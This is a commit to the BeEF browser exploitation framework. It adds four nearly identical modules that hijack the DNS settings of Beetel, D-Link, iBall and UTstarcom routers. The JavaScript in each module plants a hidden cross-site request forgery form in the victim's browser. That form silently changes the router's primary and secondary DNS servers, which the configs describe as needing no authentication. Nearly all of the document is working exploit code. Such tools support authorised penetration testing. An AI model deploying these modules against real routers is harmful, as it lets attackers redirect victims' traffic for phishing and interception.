Add router DNS hijack modules

2017-08-12 01:47:29 +00:00
parent 173a65be13
commit 81b5182689
12 changed files with 392 additions and 0 deletions
--- a/modules/exploits/router/beetel_bcm96338_router_dns_hijack/command.js
+++ b/modules/exploits/router/beetel_bcm96338_router_dns_hijack/command.js
@@ -0,0 +1,60 @@
+//
+// Copyright (c) 2006-2017 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+
+	// config
+	var target  = 'http://<%= @rhost %>/dnscfg.cgi';
+	var dns1    = '<%= @dns1 %>';
+	var dns2    = '<%= @dns2 %>';
+	var timeout = 15;
+
+	// validate primary DNS server IP address
+	var parts = dns1.split('.');
+	if (parts.length != 4) {
+		beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=an invalid Primary DNS server IP address was provided");
+		return;
+	}
+	for (var i=0; i<parts.length; i++) {
+		var part = parts[i];
+		if (isNaN(part) || part < 0 || part > 255) {
+			beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=an invalid Primary DNS server IP address was provided");
+			return;
+		}
+	}
+
+	// validate secondary DNS server IP address
+	var parts = dns2.split('.');
+	if (parts.length != 4) {
+		beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=an invalid Secondary DNS server IP address was provided");
+		return;
+	}
+	for (var i=0; i<parts.length; i++) {
+		var part = parts[i];
+		if (isNaN(part) || part < 0 || part > 255) {
+			beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=an invalid Secondary DNS server IP address was provided");
+			return;
+		}
+	}
+
+        // change DNS
+        var beetel_bcm96338_iframe_<%= @command_id %> = beef.dom.createIframeXsrfForm(target, "GET", "application/x-www-form-urlencoded", [
+                {'type':'hidden', 'name':'dnsPrimary',   'value': dns1},
+                {'type':'hidden', 'name':'dnsSecondary', 'value': dns2},
+                {'type':'hidden', 'name':'dnsDynamic', 'value': '0'},
+                {'type':'hidden', 'name':'dnsRefresh', 'value': '1'}
+        ]);
+
+	beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
+
+	// clean up
+	cleanup = function() {
+		document.body.removeChild(beetel_bcm96338_iframe_<%= @command_id %>);
+	}
+	setTimeout("cleanup()", timeout*1000);
+
+});
+
--- a/modules/exploits/router/beetel_bcm96338_router_dns_hijack/config.yaml
+++ b/modules/exploits/router/beetel_bcm96338_router_dns_hijack/config.yaml
@@ -0,0 +1,18 @@
+#
+# Copyright (c) 2006-2017 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+# References:
+# https://www.exploit-db.com/exploits/42196/
+#
+beef:
+    module:
+        beetel_bcm96338_router_dns_hijack:
+            enable: true
+            category: ["Exploits", "Router"]
+            name: "Beetel BCM96338 Router DNS Hijack"
+            description: "Attempts to change the DNS setting on a Beetel BCM96338 router.<br/><br/>This router reportedly does not require authentication to change the DNS servers.<br/><br/>This module has not been tested."
+            authors: ["Todor Donev"]
+            target:
+                unknown: ["ALL"]
--- a/modules/exploits/router/beetel_bcm96338_router_dns_hijack/module.rb
+++ b/modules/exploits/router/beetel_bcm96338_router_dns_hijack/module.rb
@@ -0,0 +1,20 @@
+#
+# Copyright (c) 2006-2017 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Beetel_bcm96338_router_dns_hijack < BeEF::Core::Command
+  
+	def self.options
+		return [
+			{'name' => 'rhost', 'ui_label' => 'Remote Host', 'value' => '192.168.1.1'},
+			{'name' => 'dns1', 'ui_label' => 'Primary DNS Server', 'value' => '8.8.8.8'},
+			{'name' => 'dns2', 'ui_label' => 'Secondary DNS Server', 'value' => '8.8.4.4'}
+		]
+	end
+
+	def post_execute
+		save({'result' => @datastore['result']})
+	end
+
+end
--- a/modules/exploits/router/dlink_dsl2640u_dns_hijack/command.js
+++ b/modules/exploits/router/dlink_dsl2640u_dns_hijack/command.js
@@ -0,0 +1,60 @@
+//
+// Copyright (c) 2006-2017 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+
+	// config
+	var target  = 'http://<%= @rhost %>/dnscfg.cgi';
+	var dns1    = '<%= @dns1 %>';
+	var dns2    = '<%= @dns2 %>';
+	var timeout = 15;
+
+	// validate primary DNS server IP address
+	var parts = dns1.split('.');
+	if (parts.length != 4) {
+		beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=an invalid Primary DNS server IP address was provided");
+		return;
+	}
+	for (var i=0; i<parts.length; i++) {
+		var part = parts[i];
+		if (isNaN(part) || part < 0 || part > 255) {
+			beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=an invalid Primary DNS server IP address was provided");
+			return;
+		}
+	}
+
+	// validate secondary DNS server IP address
+	var parts = dns2.split('.');
+	if (parts.length != 4) {
+		beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=an invalid Secondary DNS server IP address was provided");
+		return;
+	}
+	for (var i=0; i<parts.length; i++) {
+		var part = parts[i];
+		if (isNaN(part) || part < 0 || part > 255) {
+			beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=an invalid Secondary DNS server IP address was provided");
+			return;
+		}
+	}
+
+        // change DNS
+        var dlink_dsl2640u_adsl_iframe_<%= @command_id %> = beef.dom.createIframeXsrfForm(target, "GET", "application/x-www-form-urlencoded", [
+                {'type':'hidden', 'name':'dnsPrimary',   'value': dns1},
+                {'type':'hidden', 'name':'dnsSecondary', 'value': dns2},
+                {'type':'hidden', 'name':'dnsDynamic', 'value': '0'},
+                {'type':'hidden', 'name':'dnsRefresh', 'value': '1'}
+        ]);
+
+	beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
+
+	// clean up
+	cleanup = function() {
+		document.body.removeChild(dlink_dsl2640u_adsl_iframe_<%= @command_id %>);
+	}
+	setTimeout("cleanup()", timeout*1000);
+
+});
+
--- a/modules/exploits/router/dlink_dsl2640u_dns_hijack/config.yaml
+++ b/modules/exploits/router/dlink_dsl2640u_dns_hijack/config.yaml
@@ -0,0 +1,18 @@
+#
+# Copyright (c) 2006-2017 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+# References:
+# https://www.exploit-db.com/exploits/42195/
+#
+beef:
+    module:
+        dlink_dsl2640u_dns_hijack:
+            enable: true
+            category: ["Exploits", "Router"]
+            name: "D-Link DSL-2640U ADSL Router DNS Hijack"
+            description: "Attempts to change the DNS setting on a D-Link DSL-2640U ADSL router.<br/><br/>This router reportedly does not require authentication to change the DNS servers.<br/><br/>This module has not been tested."
+            authors: ["Todor Donev"]
+            target:
+                unknown: ["ALL"]
--- a/modules/exploits/router/dlink_dsl2640u_dns_hijack/module.rb
+++ b/modules/exploits/router/dlink_dsl2640u_dns_hijack/module.rb
@@ -0,0 +1,20 @@
+#
+# Copyright (c) 2006-2017 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Dlink_dsl2640u_dns_hijack < BeEF::Core::Command
+  
+	def self.options
+		return [
+			{'name' => 'rhost', 'ui_label' => 'Remote Host', 'value' => '192.168.1.1'},
+			{'name' => 'dns1', 'ui_label' => 'Primary DNS Server', 'value' => '8.8.8.8'},
+			{'name' => 'dns2', 'ui_label' => 'Secondary DNS Server', 'value' => '8.8.4.4'}
+		]
+	end
+
+	def post_execute
+		save({'result' => @datastore['result']})
+	end
+
+end
--- a/modules/exploits/router/iball_baton_ib_wra150n_dns_hijack/command.js
+++ b/modules/exploits/router/iball_baton_ib_wra150n_dns_hijack/command.js
@@ -0,0 +1,60 @@
+//
+// Copyright (c) 2006-2017 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+
+	// config
+	var target  = 'http://<%= @rhost %>/dnscfg.cgi';
+	var dns1    = '<%= @dns1 %>';
+	var dns2    = '<%= @dns2 %>';
+	var timeout = 15;
+
+	// validate primary DNS server IP address
+	var parts = dns1.split('.');
+	if (parts.length != 4) {
+		beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=an invalid Primary DNS server IP address was provided");
+		return;
+	}
+	for (var i=0; i<parts.length; i++) {
+		var part = parts[i];
+		if (isNaN(part) || part < 0 || part > 255) {
+			beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=an invalid Primary DNS server IP address was provided");
+			return;
+		}
+	}
+
+	// validate secondary DNS server IP address
+	var parts = dns2.split('.');
+	if (parts.length != 4) {
+		beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=an invalid Secondary DNS server IP address was provided");
+		return;
+	}
+	for (var i=0; i<parts.length; i++) {
+		var part = parts[i];
+		if (isNaN(part) || part < 0 || part > 255) {
+			beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=an invalid Secondary DNS server IP address was provided");
+			return;
+		}
+	}
+
+        // change DNS
+        var iball_baton_ib_wra150n_iframe_<%= @command_id %> = beef.dom.createIframeXsrfForm(target, "GET", "application/x-www-form-urlencoded", [
+                {'type':'hidden', 'name':'dnsPrimary',   'value': dns1},
+                {'type':'hidden', 'name':'dnsSecondary', 'value': dns2},
+                {'type':'hidden', 'name':'dnsDynamic', 'value': '0'},
+                {'type':'hidden', 'name':'dnsRefresh', 'value': '1'}
+        ]);
+
+	beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
+
+	// clean up
+	cleanup = function() {
+		document.body.removeChild(iball_baton_ib_wra150n_iframe_<%= @command_id %>);
+	}
+	setTimeout("cleanup()", timeout*1000);
+
+});
+
--- a/modules/exploits/router/iball_baton_ib_wra150n_dns_hijack/config.yaml
+++ b/modules/exploits/router/iball_baton_ib_wra150n_dns_hijack/config.yaml
@@ -0,0 +1,18 @@
+#
+# Copyright (c) 2006-2017 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+# References:
+# https://www.exploit-db.com/exploits/42192/
+#
+beef:
+    module:
+        iball_baton_ib_wra150n_dns_hijack:
+            enable: true
+            category: ["Exploits", "Router"]
+            name: "iBall Baton iB-WRA150N DNS Hijack"
+            description: "Attempts to change the DNS setting on a iBall Baton iB-WRA150N router.<br/><br/>This router reportedly does not require authentication to change the DNS servers.<br/><br/>This module has not been tested."
+            authors: ["Todor Donev"]
+            target:
+                unknown: ["ALL"]
--- a/modules/exploits/router/iball_baton_ib_wra150n_dns_hijack/module.rb
+++ b/modules/exploits/router/iball_baton_ib_wra150n_dns_hijack/module.rb
@@ -0,0 +1,20 @@
+#
+# Copyright (c) 2006-2017 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Iball_baton_ib_wra150n_dns_hijack < BeEF::Core::Command
+  
+	def self.options
+		return [
+			{'name' => 'rhost', 'ui_label' => 'Remote Host', 'value' => '192.168.1.1'},
+			{'name' => 'dns1', 'ui_label' => 'Primary DNS Server', 'value' => '8.8.8.8'},
+			{'name' => 'dns2', 'ui_label' => 'Secondary DNS Server', 'value' => '8.8.4.4'}
+		]
+	end
+
+	def post_execute
+		save({'result' => @datastore['result']})
+	end
+
+end
--- a/modules/exploits/router/utstarcom_wa3002g4_dns_hijack/command.js
+++ b/modules/exploits/router/utstarcom_wa3002g4_dns_hijack/command.js
@@ -0,0 +1,60 @@
+//
+// Copyright (c) 2006-2017 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+
+	// config
+	var target  = 'http://<%= @rhost %>/dnscfg.cgi';
+	var dns1    = '<%= @dns1 %>';
+	var dns2    = '<%= @dns2 %>';
+	var timeout = 15;
+
+	// validate primary DNS server IP address
+	var parts = dns1.split('.');
+	if (parts.length != 4) {
+		beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=an invalid Primary DNS server IP address was provided");
+		return;
+	}
+	for (var i=0; i<parts.length; i++) {
+		var part = parts[i];
+		if (isNaN(part) || part < 0 || part > 255) {
+			beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=an invalid Primary DNS server IP address was provided");
+			return;
+		}
+	}
+
+	// validate secondary DNS server IP address
+	var parts = dns2.split('.');
+	if (parts.length != 4) {
+		beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=an invalid Secondary DNS server IP address was provided");
+		return;
+	}
+	for (var i=0; i<parts.length; i++) {
+		var part = parts[i];
+		if (isNaN(part) || part < 0 || part > 255) {
+			beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=an invalid Secondary DNS server IP address was provided");
+			return;
+		}
+	}
+
+        // change DNS
+        var utstarcom_wa3002G4_iframe_<%= @command_id %> = beef.dom.createIframeXsrfForm(target, "GET", "application/x-www-form-urlencoded", [
+                {'type':'hidden', 'name':'dnsPrimary',   'value': dns1},
+                {'type':'hidden', 'name':'dnsSecondary', 'value': dns2},
+                {'type':'hidden', 'name':'dnsDynamic', 'value': '0'},
+                {'type':'hidden', 'name':'dnsRefresh', 'value': '1'}
+        ]);
+
+	beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
+
+	// clean up
+	cleanup = function() {
+		document.body.removeChild(utstarcom_wa3002G4_iframe_<%= @command_id %>);
+	}
+	setTimeout("cleanup()", timeout*1000);
+
+});
+
--- a/modules/exploits/router/utstarcom_wa3002g4_dns_hijack/config.yaml
+++ b/modules/exploits/router/utstarcom_wa3002g4_dns_hijack/config.yaml
@@ -0,0 +1,18 @@
+#
+# Copyright (c) 2006-2017 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+# References:
+# https://www.exploit-db.com/exploits/42194/
+#
+beef:
+    module:
+        utstarcom_wa3002g4_dns_hijack:
+            enable: true
+            category: ["Exploits", "Router"]
+            name: "UTstarcom WA3002G4 DNS Hijack"
+            description: "Attempts to change the DNS setting on a UTstarcom WA3002G4 router.<br/><br/>This router reportedly does not require authentication to change the DNS servers.<br/><br/>This module has not been tested."
+            authors: ["Todor Donev"]
+            target:
+                unknown: ["ALL"]
--- a/modules/exploits/router/utstarcom_wa3002g4_dns_hijack/module.rb
+++ b/modules/exploits/router/utstarcom_wa3002g4_dns_hijack/module.rb
@@ -0,0 +1,20 @@
+#
+# Copyright (c) 2006-2017 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Utstarcom_wa3002g4_dns_hijack < BeEF::Core::Command
+  
+	def self.options
+		return [
+			{'name' => 'rhost', 'ui_label' => 'Remote Host', 'value' => '192.168.1.1'},
+			{'name' => 'dns1', 'ui_label' => 'Primary DNS Server', 'value' => '8.8.8.8'},
+			{'name' => 'dns2', 'ui_label' => 'Secondary DNS Server', 'value' => '8.8.4.4'}
+		]
+	end
+
+	def post_execute
+		save({'result' => @datastore['result']})
+	end
+
+end